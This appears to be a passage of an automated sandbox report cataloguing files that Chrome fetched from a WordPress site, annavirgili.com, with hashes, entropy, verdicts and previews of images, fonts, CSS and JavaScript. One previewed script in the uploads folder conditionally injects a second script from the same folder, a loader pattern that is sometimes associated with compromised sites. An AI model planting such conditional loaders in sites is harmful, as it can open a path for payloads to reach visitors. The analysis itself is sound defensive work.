                                                                                                          SSDEEP:12288:CY8ImzF+S6Siwg1sCz4OayZ2RVIC6PfeaLTbdUSrTBM:GIndllayMAC63jLTBjTS
                                                                                                          MD5:3DFF97245159F2AC73281A5675AAE802
                                                                                                          SHA1:6EBC82BCDB21084DE875DD19BDAE25879A8102B2
                                                                                                          SHA-256:32DD257CE6132923E904DE23B47F9B49B280CF69063344192F9A436EF6F95561
                                                                                                          SHA-512:C2621F0968CC6DC63625E06FC8D566DBE720D2E5F43C2E9B8556E3B0D3EE725DD95B51A876A652C5750E28288C8F39AA8D504BDC2FA301F89E6B9B8DF9CCFF9B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2022/10/SLIDER-HOME-AV-scaled.jpg
                                                                                                          Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."....................................................................................f....|].+..i^=...t-.n...]U.. `....<.+.ug..v....e....Uo.....S.v..T......I...*.b..P..8.R..tD...+<n/s...g.s..K.K7i.LGE=..n....N]'X.E...z).b........!...........LCC.................1.@.................4.@....h.....L..........0C.....`...L.d...A.lG&.L..0...L...L.K.B-.I.......)B@6$....Y..Mk..2.FQQ.@.%..FP_......*.@a..Y...G....N..>....=(th..jE4_Ut/..w.q......q<.ks..*.-.2L.t]s...o.'r\.....tZ....}N&Z....g.0l&.jP..~m...`..I..0.,EvF@ UZ.O7......+gr.._.x....U....:.C..B.+=..4I..!....................@..@........................&R..................................(...0....g;......2.1..M......J.D....a.....#@. #:.P..B.l-.@.....G.8L...*.\...(J..3..LPFQ$..,*g.\.AFV....Ng^!N.".
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65497)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):157372
                                                                                                          Entropy (8bit):4.808422684653547
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:zg9zWL67C2WV0ofiOKvYtPyFyZCynfQL7k:zJV/fiOuGZCyf
                                                                                                          MD5:497721199FB619484A7D9A63850A4731
                                                                                                          SHA1:FBB64360C43F925F5D7F40082065E2849209670E
                                                                                                          SHA-256:6F5705A78796992F8A9EC97DAC43AF631311FB451D8E2927210533FDE8982051
                                                                                                          SHA-512:6DD8CBC122374A8BFF5C9074DCDDC94578ACD737AF62FACC28440EBDA124D0C7533E0D03352469C996DA7444C230588972B22100B04EF45226BB441EA3CDDC9B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.6.1
                                                                                                          Preview:/*! elementor - v3.6.1 - 23-03-2022 */..dialog-widget-content{background-color:#fff;position:absolute;border-radius:3px;-webkit-box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);overflow:hidden}.dialog-message{font-size:12px;line-height:1.5;-webkit-box-sizing:border-box;box-sizing:border-box}.dialog-type-lightbox{position:fixed;height:100%;width:100%;bottom:0;left:0;background-color:rgba(0,0,0,.8);z-index:9999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.dialog-type-lightbox .dialog-widget-content{margin:auto;width:375px}.dialog-type-lightbox .dialog-header{font-size:15px;color:#495157;padding:30px 0 10px;font-weight:500}.dialog-type-lightbox .dialog-message{padding:0 30px 30px;min-height:50px}.dialog-type-lightbox:not(.elementor-popup-modal) .dialog-header,.dialog-type-lightbox:not(.elementor-popup-modal) .dialog-message{text-align:center}.dialog-type-lightbox .dialog-buttons-wrapper{border-top:1px solid #e6e
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3248)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3428
                                                                                                          Entropy (8bit):5.036898941425704
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:NsrsSHC53AZPQYahLJfIBW8c68tfpLBlfPmTsbyDeUasJBW0uxavfGYDtheEeSr/:2rsdOQYQL6/cR3GT+DmBWfwvfL
                                                                                                          MD5:DD6A0D8D7B3E0AFBBC0BBB417DCC387B
                                                                                                          SHA1:0B38C782DA1C8ECC6BC7E854F8841FB9D2C86E35
                                                                                                          SHA-256:F36ADC07DB49E73C3FD3AEB4234D270725F07719706DD28DFC09657F2CFFE9D6
                                                                                                          SHA-512:E0963A8C2DE54CA9A29D2F3FB0ADF54946172E11589F0DA3DAFBF603B9F38C7A4A8A977465B0A9C32DA9D4127D916E60C390DEA1E17D55B3EDEE0B760401135C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * jQuery UI Mouse 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../ie","../version","../widget"],e):e(jQuery)}(function(o){"use strict";var n=!1;return o(document).on("mouseup",function(){n=!1}),o.widget("ui.mouse",{version:"1.13.3",options:{cancel:"input, textarea, button, select, option",distance:1,delay:0},_mouseInit:function(){var t=this;this.element.on("mousedown."+this.widgetName,function(e){return t._mouseDown(e)}).on("click."+this.widgetName,function(e){if(!0===o.data(e.target,t.widgetName+".preventClickEvent"))return o.removeData(e.target,t.widgetName+".preventClickEvent"),e.stopImmediatePropagation(),!1}),this.started=!1},_mouseDestroy:function(){this.element.off("."+this.widgetName),this._mouseMoveDelegate&&this.document.off("mousemove."+this.widgetName,this._mouseMoveDelegate).of
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):707
                                                                                                          Entropy (8bit):7.4201500949823735
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:6v/7m/6TziQEG1npPuoJYKJQ0Ghr0bPwFl95XCHKCHMnsaldS05vCIO59aYdp1Z0:b/6XsanZJeeehrJ/bXCHvMZlc05vCd5q
                                                                                                          MD5:E4896565595FC22E344FD619C0ED15BB
                                                                                                          SHA1:43D4481A4CC3E60B406B2467B5F7E576FCBAE260
                                                                                                          SHA-256:C3A4CB8F32EF0CD89E6429D40D1FAEBD359E02E34D69764052C8402A391E9A00
                                                                                                          SHA-512:0AB96B0D29EEB56D1BBEF4017DD039701FA85775F50F6B9DCD50FC0D8853228F1AD1FD9A4593D5CF9CE521CF84C31145C10A99588C2D243E114400723E02549C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR................a....pHYs................ cHRM..z%..............u0...`..:....o._.F...IIDATx..]H.Q...g{.95..1....b$.0$.f.}..IE.fA]D.E`..^....J.....R".r..Q.....1?&.........]....s........BJ.j$.+..<W.80.......-..y4l.....c1^<.g..e.Tr...pc7.......(.kIufg+@Z......rbo)E.j.{....}.v.tL6.e{\..Q.gc....W.i.`..=..E.L.......=.......'4..".ef.*v.......`.@.Lp..fCj..!..\.U'...8......7mU.~.m$5.....H.f.HI.............q...b.'"h.)D...#..`.*...........K.....de%+..pW"...._..|Axr....J<....ZHy.....Y.H..%0o%.OM.x.)...0...N...........}.'.......:.w.Qq.Cg.8.k........e...:...U..6.....8y.&.?.....Zvh....KgX..@dq.A...;]HM#...w$.@....j.........@..f.Y....`N..B....j..w.....kXp7....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2255)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):15731
                                                                                                          Entropy (8bit):5.279278552900424
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:aMUbeQmo0xy8U60jUHLHQXE/o+L4xeFbwFFEuxua/:aFbuo0xy8IjUHLHQXE/o+L4xeFbwFBx5
                                                                                                          MD5:C565AE704E8D7E680F40A8DCEB8F5C38
                                                                                                          SHA1:59622F3D3CE70D83E61D84EFD6DC25912EC6F534
                                                                                                          SHA-256:04171DA73F728FA44FA31F1B188D1642CB3798DE505F5956E7B9381C4D580D3B
                                                                                                          SHA-512:91677AB37D46E809CF8FF59733184B088979524AE15B9F36954ED0BCF4E3AAA66B09B405BA39A17E1EB5D708582E2DE5E781BC61B538547E720B180456A62C42
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/vendors/swiper/swiper.css?ver=5.3.1
                                                                                                          Preview:/**. * Swiper 5.3.1. * Most modern mobile touch slider and framework with hardware accelerated transitions. * http://swiperjs.com. *. * Copyright 2014-2020 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: February 8, 2020. */..@font-face {. font-family: 'swiper-icons';. src: url("data:application/font-woff;charset=utf-8;base64, d09GRgABAAAAAAZgABAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAAGRAAAABoAAAAci6qHkUdERUYAAAWgAAAAIwAAACQAYABXR1BPUwAABhQAAAAuAAAANuAY7+xHU1VCAAAFxAAAAFAAAABm2fPczU9TLzIAAAHcAAAASgAAAGBP9V5RY21hcAAAAkQAAACIAAABYt6F0cBjdnQgAAACzAAAAAQAAAAEABEBRGdhc3AAAAWYAAAACAAAAAj//wADZ2x5ZgAAAywAAADMAAAD2MHtryVoZWFkAAABbAAAADAAAAA2E2+eoWhoZWEAAAGcAAAAHwAAACQC9gDzaG10eAAAAigAAAAZAAAArgJkABFsb2NhAAAC0AAAAFoAAABaFQAUGG1heHAAAAG8AAAAHwAAACAAcABAbmFtZQAAA/gAAAE5AAACXvFdBwlwb3N0AAAFNAAAAGIAAACE5s74hXjaY2BkYGAAYpf5Hu/j+W2+MnAzMYDAzaX6QjD6/4//Bxj5GA8AuRwMYGkAPywL13jaY2BkYGA88P8Agx4j+/8fQDYfA1AEBWgDAIB2BOoAeNpjYGRgYNBh4GdgYgABEMnIABJzYNADCQAACWgAsQB42mNg
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (375), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):375
                                                                                                          Entropy (8bit):5.099726776601618
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:CRh6hQp8mgO9lVBc9kZUXXRnBEK9EJ1lLBKWP50ksaJObChQp8mgO9lVhnhw3wQ5:shPCurHZAE8knKATskOLCuHniaUjenKZ
                                                                                                          MD5:1EA1DE5C96844259529FF4C5F7A1F8AA
                                                                                                          SHA1:D97E411804B674D826245B205B661112117FD9EF
                                                                                                          SHA-256:2F59A26AD63F459E6C627F75609FA938456F24B1CD0EF8B27770165E9A76420D
                                                                                                          SHA-512:EC9D187A7F722B3EFFC19FE7E06A41702008A1567C7CD2E767650224068055F8ED364C9726EE4885C31EA6666DA3678C48565CDDAC6C0E2A4A1B44C855E89158
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/fgcheck.min.js?ver=1.0
                                                                                                          Preview:if(function(){let e=document.createElement("div");e.innerHTML="<div style='display:flex;flex-direction:column;gap:1px;'><div></div><div></div></div>",document.body.appendChild(e);let t=1===e.scrollHeight;return e.remove(),!t}()||window._testFB){let e=document.createElement("script");e.setAttribute("src","/wp-content/uploads/fgfallback.min.js"),document.body.appendChild(e)}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (20372)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20415
                                                                                                          Entropy (8bit):5.112597669901674
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:/Nd4dUtaQ9HuGJswyVO+pYDTWmMo7YtDTRHJiM3kohVvFhN7KOljuOzQYqEbzGvy:/Nd4dUtaQ9HuGJswyV/pkTAQYtDTRHJd
                                                                                                          MD5:A11D02D00B6F15E20609B4F8FF56C270
                                                                                                          SHA1:B7519FB554E01DE96704303B1469BE3C31CD548B
                                                                                                          SHA-256:20EDFBBE7C60D8E3562BDCDA2DFCA7CE7C2F7F55B67FE478904B9FC74A8D6C7D
                                                                                                          SHA-512:0A4BCE6522A16B2A103CFD701BED9A6514BC16764410B434FEA3251BDE80F72422B3B3B0C985384B6F7E5590223A46C548524B4C6182C6629E73179AF3CF17F9
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */.(self.webpackChunkelementor_pro=self.webpackChunkelementor_pro||[]).push([[819],{7914:e=>{e.exports=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}},e.exports.__esModule=!0,e.exports.default=e.exports},2:(e,t,n)=>{"use strict";var s=n(7914);n(4242);var i=s(n(4774)),o=s(n(9575)),r=s(n(6254)),a=s(n(5161)),l=s(n(5039)),c=s(n(9210));class ElementorProFrontend extends elementorModules.ViewModule{onInit(){super.onInit(),this.config=ElementorProFrontendConfig,this.modules={}}bindEvents(){jQuery(window).on("elementor/frontend/init",this.onElementorFrontendInit.bind(this))}initModules(){let e={motionFX:i.default,sticky:o.default,codeHighlight:r.default,videoPlaylist:a.default,payments:l.default,progressTracker:c.default};elementorProFrontend.trigger("elementor-pro/modules/init:before"),e=elementorFrontend.hooks.applyFilters("elementor-pro/frontend/handlers",e),jQuery.each(e,((e,t)=>{this.modules[e]=new t})),this.modules.linkActi
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 52648, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):52648
                                                                                                          Entropy (8bit):7.996033428788516
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:9eBlxzWRUJTVGP5v267Q1Sk+S2/D8l+8O2:9maeeP5v267Q7w8z
                                                                                                          MD5:657E828FB3A5963706E24CBF9D711BB8
                                                                                                          SHA1:84C08557D977E0A46EC8941B2D84235069DAB229
                                                                                                          SHA-256:45E39853C41558C4922FF1B0895547A99E378F136EC3D9D2F4DF15CC269485FA
                                                                                                          SHA-512:EEBEDF24A2516B860FFA2C9241474157604F8FC2EDC9E3BF3C0A0DDDF3168519F13FC195D48D232ED8F4A5DB1C48EF0563D62B2E2BDCF55F936CBD319AB18E16
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-brands-400.woff2
                                                                                                          Preview:wOF2.............r....V.........................T.V..f...h..X.6.$..|..... ..*..m[.#qB.......*...v......@(B...............1......T+.....d.2OaAf.j.....b.>.........?2|/F...PR*J4[ &..b....E......../...q..4`M*D.c...-|.a.q.b..h..m..4....... ..N...?B....k.?.Ja.F7=....u|....zx..z..L.....ht......:w.-.P..!...Yh..q.=..'aP[........ .d.u......D65...,.HD.6..........8..4...(...V.........Q..../...8@.+J.B*..I.L........N...sn.n............&.5.rC0.nc,.X...".0r......D.."*F.6........b..._.....q$.c.[.y......../.0..#..$,.?..P......_...J..&...).c^.do...;~.....^...K...........7.[...BN..I.o.8.....{.....K.I#....~w._[e..... ..C@.n*.qd.....]T..Im.....';...."Y.,S$.I.N...6....m.!...;...2.m9E.\..d.=.W...{...S.#...y$T...]G...Bdp^.#.B....@a];.Q}....._.f..Y.I-....!9...].F/a.[.^..0..VMw..@..]...[.......-.~....U..)m....fc..N..-..iI.l]........u.{..k.y....+)X-.+p.V<.19.q.u8...T....n"..u....~..lIj.\..l....Pa$.$....i.....4%.....k.....e...\l9d..d...R.ij..NHRP:..>...s`.|
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):43
                                                                                                          Entropy (8bit):2.7374910194847146
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:CU9yltxlHh/:m/
                                                                                                          MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                          SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                          SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                          SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://mc.yandex.com/sync_cookie_image_decide_secondary?token=10592.xJ39efFSl6NKi173B-s1GyyZW39P8WHvsWbCdc0zyqe7ezKsL6lhE9xLp8xlf1bCCce0hAHvZZ1O6tM3JBNnH1mtJabwsaTNSrLz5Dpg6uSM2hL31dP0m_S_dE-Z4fYUUZojAywc7x8FnZbaVwWyectviqxvGFtSBeZjRhNsxKYQ3chl_iF2XdCUmKpsmLoGIw7Gg3F-zn95axvscXezyIkhtNMfMJeU4I-NRupWdMs%2C.yDK38o_7eQyKH3qJYvFBkfklAcM%2C
                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 13508, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):13508
                                                                                                          Entropy (8bit):7.9848595404020495
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:qNfWn6GyNb3qnZTRAaSqnoNxnMKoaUzQwwcNlc:kWpRRDPo/MKUfXlc
                                                                                                          MD5:DDE2379A58B73AA459E27D560B35EE4F
                                                                                                          SHA1:8EFF2352ACB3B2DE206C0444F4F704ED46CFB134
                                                                                                          SHA-256:9E7FE0EDBC32BBDA00BDEF6DC0241BC78277A37D4CEEAB5991C64D11915746B9
                                                                                                          SHA-512:83ED52C35A95B663E71452A250675A71E1F4EFED85D732CDC6781DD13AFAB1BFE852AAAEEA765165F615BD2D153BEC4EF167934D31C20D9632E18C87D89B1778
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aevGw.woff2
                                                                                                          Preview:wOF2......4.......z...4c..........................$..r....`?STATH..2....X./..J..6.$..l. ..........i...K...@...0"......!.m...".QV%..2v9K.|.R.O7..qj..J|...........7..H.3_..hQ....3}...(.>..nq.v[.lX.]8..Y..;..F.$'/.....M....$v.....T.2...WY..<)..?g?.$.a!ABx.&.f......PC<.............U%u......{.....0"..n.D7.3FCJ.....{..@S...x...q....A;....<..(.l.-.V.(.H..7<?..u........'f.$_....8$N.x."u?jB'...RO...si......=...f..DLN..a""......A.....$.._...t..uk.U.^).r*..&.....a"@.u{2.e&.C..7.).Mh._"..... ..M..}|Z.P..N...b.....9T...^......&.%N )..A....]R3.p3t.t!'..Rr./.P..]...tQ_S].CQ..4.,.....c....t.n_....Yp..c...$H.""".q....t,..TJ.Q...:.d:..|.,5U.2?.+..."`..K........`H.o....M..2LbN...3..`...1....!....Ab q* .Z m. z.0........#....t.../.3!.D.Z-.ny.:.!.........V...."H?*.~...Hv..q...........B..!I...[.....[ .m....z.C,E.sn.g..4O?.....L.EJ.b...u&..O...%....c2a._|8_2.X.?.c\(*..T....W..dp...(.....u.7 .v.:.9..w0P.z.\6....L......Ow.[(....K...\./.....>..m................pG..]5.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", progressive, precision 8, 1706x2560, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):196368
                                                                                                          Entropy (8bit):7.865958617799944
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:FeAPSSWtKwho6FSN3Xuc+X0iAoXE9Pgk/YC9mnymfXoszK:FeAPSScKwho4SJuc3noXE9PgkgC90e
                                                                                                          MD5:02D8CA3C6CAF7DB4587CAF9C9B13DF41
                                                                                                          SHA1:2E788AB30E35E5B88E12F4F1FFEA28A440A1940A
                                                                                                          SHA-256:6C26536E00E19708E36196B5CE05D48A1590E6D5F206E7A9C94C1A4116DCFCF2
                                                                                                          SHA-512:C2DDD5B03FDB9E4685337613612B10AAAC67E2428C38F7E1B0D397CAAB1FECDB04B0D9935ADFE50EEC4401A2545A92D3968767471315AA89C06C63372FAA1B9B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2024/09/1-bis-scaled.jpg
                                                                                                          Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."..............................................................................X.................................................................................................................................................................E..................................................................................R...............................................................................@..................................................................................(..............................................................................J.D................................................................................ ...................................................................@....................................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1823
                                                                                                          Entropy (8bit):4.532101813350908
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7TK3s1SKiU3s89K/wLbdParPYtiHLb2iyT3P7wkUwp+x1X0Ef:q3iSKb3R9K/wFqtKp+xZ0Ef
                                                                                                          MD5:2DC80B6309B74087CCB664826A61BFB0
                                                                                                          SHA1:4346E25D252B40BE817FC1CB2214FB147E148E6C
                                                                                                          SHA-256:FC9696AC68E0C65FDB2AD0C19AECD8ADA9DB29176ADD61BC840C48328797C884
                                                                                                          SHA-512:F07EEF7C6D9900C1D0DAADD50E356ECD11B4BFD46CA84AAF8A9369BCD0DEF6C76ACAAE1582E47EA63B517856916B42C017E6DCE266DC7775FC808ABCFB302F8C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js?ver=3.3.0
                                                                                                          Preview:"use strict";.function woof_init_labels() {. jQuery('.woof_label_term').on('click', function () {.. var checkbox = jQuery(this).find('input.woof_label_term').eq(0);.. if (jQuery(checkbox).is(':checked')) {. jQuery(checkbox).attr("checked", false);. jQuery(this).removeClass("checked");. woof_label_process_data(checkbox, false);. } else {. jQuery(checkbox).attr("checked", true);. jQuery(this).addClass("checked");. woof_label_process_data(checkbox, true);. }. });.}.function woof_label_process_data(_this, is_checked) {. var tax = jQuery(_this).data('tax');. var name = jQuery(_this).attr('name');. var term_id = jQuery(_this).data('term-id');. woof_label_direct_search(term_id, name, tax, is_checked);.}.function woof_label_direct_search(term_id, name, tax, is_checked) {. var values = '';. var checked = true;. if (is_checked) {. if (tax in woof_current_values) {.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5095), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):5095
                                                                                                          Entropy (8bit):4.700414542663715
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:HJLAn8vitjRv70qas3faLAn8MqaRvZdsjfihsu5uzLAn8D+gORvp69wP:p08qBpxasPa08MqaPdMfju5uz08D1OXb
                                                                                                          MD5:C5F8603C397655C844D2D45C125CD904
                                                                                                          SHA1:E688DA265AAE8AE56C85161E58F1DFECE51A880B
                                                                                                          SHA-256:832319E19532D936D6756B4EDBE9F49A5E0B0BAC7B5F402267F239BF2DB8A7AC
                                                                                                          SHA-512:20E9CF863EB64AEA78251119B31DB46BBD6774449755ED3DA8117F9F8C5C00036BBF0A84811FDBFB3891925B92E1B269E750899C9584420B970BA3E42830C162
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/elementor/css/post-336.css?ver=1709081758
                                                                                                          Preview:.elementor-336 .elementor-element.elementor-element-268fdff:not(.elementor-motion-effects-element-type-background), .elementor-336 .elementor-element.elementor-element-268fdff > .elementor-motion-effects-container > .elementor-motion-effects-layer{background-color:#F6F6F6;}.elementor-336 .elementor-element.elementor-element-268fdff{transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;}.elementor-336 .elementor-element.elementor-element-268fdff > .elementor-background-overlay{transition:background 0.3s, border-radius 0.3s, opacity 0.3s;}.elementor-336 .elementor-element.elementor-element-5642a81e{--divider-border-style:solid;--divider-color:#E3E3E3;--divider-border-width:1px;}.elementor-336 .elementor-element.elementor-element-5642a81e .elementor-divider-separator{width:100%;}.elementor-336 .elementor-element.elementor-element-5642a81e .elementor-divider{padding-top:0px;padding-bottom:0px;}.elementor-336 .elementor-element.elementor-element-6b8c29ef > .elementor-
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):5126
                                                                                                          Entropy (8bit):7.957513975412577
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:6ccq7FABkCAEZRZ/cKyo0m6kPP1iqJjPDj20nUAXET6Yq582GpdPOJUn:6X2C5ZP/cKOhkPsqJjf582YPkUn
                                                                                                          MD5:F485FFB381BC13DE8CA39BE5AE12B10D
                                                                                                          SHA1:9DB60D69BB9D136DAB05D5AC35AE49F29CD0AE36
                                                                                                          SHA-256:8EFB6E853BEBFDC367BFBE43180AE7183478000C6BFF4C82C965B6A84C4088B2
                                                                                                          SHA-512:F61C31ACF070924F6BF7F45EEA0E52236111DEB695088B66AA6B04806507D3F578AD1B12F0F682E1FDE4D4B73B1CC96B6F8B0B29B73B595664B5A76524728DDE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://static.hotjar.com/c/hotjar-3301862.js?sv=5
                                                                                                          Preview:.(.!..........m....|..K..(6[.h.Y.TSY'pW..%.cPbd.$'M.:35...[.7z5..E......w{..H.Y0...!..I..>....)..M.s....^.(l-..t.+7..&PBNY._.._j.K.^...`...uQK.<C.."..$...@,...#...~..c......{e.v.Mv..$...:(.s.jFm."6|<...6^..n\...o,f|.P.O...hZ........:.k........Dc#.r...fgd&phut..7S.9.....B..(g.....Qo6'b....^.[..j....!.L.5>.....Te;..F...Uv|.R...f..K...1.......*;....T..smr..AT....F%.c]UO..-K.....G...V..W.Lz..2#.Q..J....v....7....h.].f.........k.....[..c...LG..v..L^ ...R)....(......YY..;C.8.....w..:L..G...........d.=D.S..../....J....X.%.y l......U.S.s2..=.g.P.=..:..Jd..]...4e'?..r&w..Ca..2W.......p...C.~.. .d2."N..I.$Wir9,.I....d.9...(...0-.............H..._..1....%...y.sO.ecr.k.!.....k"..l.DJz.[...t..U...o|......5...T.....`;1.I..rw.;...R.9..#<@8..ED..h..J.=E.D.V&S..g..=;..7...f.9..l.m.....z)h.S....K.....t.S.7..(.(g......(.......fa.iC.p..0..`X.KJ.v.$=I...y.k{JY....|.j.A{......g..(.Ii.]..\U.......$P.nz5..z......~E...[..\_w....c..Tt.C..9a..M..x...i..W=R
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3340
                                                                                                          Entropy (8bit):4.528023025464945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ld/N5pGRF5FXRhqyGDXU8zXrCgxgOCrtGuXRzGzX7+h6Kp+xZ0NNv:ld/N5pGRF5/hqyGbj+gxgOCrtGSzG3Ux
                                                                                                          MD5:AA872DB78AC1FCFF6FC07934119E7971
                                                                                                          SHA1:EA2F0148E17C2015CD218EBE0963B011B7177580
                                                                                                          SHA-256:A5B55ACB8BFE342B6A815A98838145D70F77F4BB0ED9EF2AF93136DE3BD454BC
                                                                                                          SHA-512:BFDE4CAEA57C782468F647DCCA5D1DDEA191BA11E8E3D769C5B028249C87C41632A0EC5D9FD38A38A75940ED0D6181FDD1FCC6FEEF39F61E510D0089EFE9A321
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";.function woof_init_checkboxes() {. if (icheck_skin != 'none') {.. jQuery('.woof_checkbox_term').iCheck('destroy');.. jQuery('.woof_checkbox_term').iCheck({. checkboxClass: 'icheckbox_' + icheck_skin.skin + '-' + icheck_skin.color,. });... jQuery('.woof_checkbox_term').off('ifChecked');. jQuery('.woof_checkbox_term').on('ifChecked', function (event) {. jQuery(this).attr("checked", true);. jQuery(".woof_select_radio_check input").attr('disabled','disabled');. woof_checkbox_process_data(this, true);. });.. jQuery('.woof_checkbox_term').off('ifUnchecked');. jQuery('.woof_checkbox_term').on('ifUnchecked', function (event) {. jQuery(this).attr("checked", false);. woof_checkbox_process_data(this, false);. });.. //this script should be, because another way wrong way of working if to click on the label. jQuery('.woof_checkbox_label').off
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4741)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4776
                                                                                                          Entropy (8bit):5.153085086858448
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:vmK40IdSs6c7DE/3sc/YrEBnUBPwKxbqe/Ds91sBYt1Em4kCofWQRemN:OK40IdS/cHg3NZBnUJbqe/DeGYtu7kC6
                                                                                                          MD5:C6FDDBB6BE69793478DE26FC245B2ACF
                                                                                                          SHA1:A136EBF5054FDC19729B3592005FE0FEFEC4BB4C
                                                                                                          SHA-256:9A1E0D38B691F1D22A92CFF65EC0439B428170AC39A4493C7ECB06D5585F56A3
